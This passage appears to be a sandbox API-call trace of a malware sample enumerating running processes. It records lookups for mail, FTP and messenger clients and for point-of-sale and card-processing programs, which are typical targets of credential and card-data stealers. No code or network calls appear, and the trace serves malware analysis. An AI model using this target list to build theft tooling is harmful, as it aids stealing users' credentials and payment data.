szExeFile="fling.exe")) returned 1 [0274.271] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0274.273] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0274.275] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0274.277] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0274.281] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0274.283] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0274.285] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0274.287] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0274.288] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0274.290] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0274.292] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0274.294] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0274.299] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0274.301] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0274.303] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0274.305] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0274.306] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0274.308] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0274.420] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0274.423] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0274.425] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0274.428] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0274.430] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0274.432] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0274.438] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0274.440] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0274.442] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0274.445] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0274.447] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0274.453] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0274.455] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0274.457] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0274.459] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0274.461] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0274.462] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0274.464] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0274.500] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0274.502] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0274.503] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0274.505] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0274.507] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0274.508] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0274.510] CloseHandle (hObject=0x9e0) returned 1 [0274.510] Sleep (dwMilliseconds=0x64) [0274.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0274.684] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.689] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0274.691] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0274.693] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.695] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0274.697] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.699] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0274.704] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0274.706] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0274.707] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.709] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.710] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0274.712] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.713] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.746] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.751] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.752] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.754] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.755] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.757] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0274.758] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0274.760] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0274.761] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.766] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0274.767] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0274.769] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0274.770] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0274.771] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.773] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0274.774] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0274.776] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0274.778] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0274.784] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0274.786] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0274.789] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0274.792] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0274.845] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0274.847] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0274.848] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0274.850] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0274.851] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: 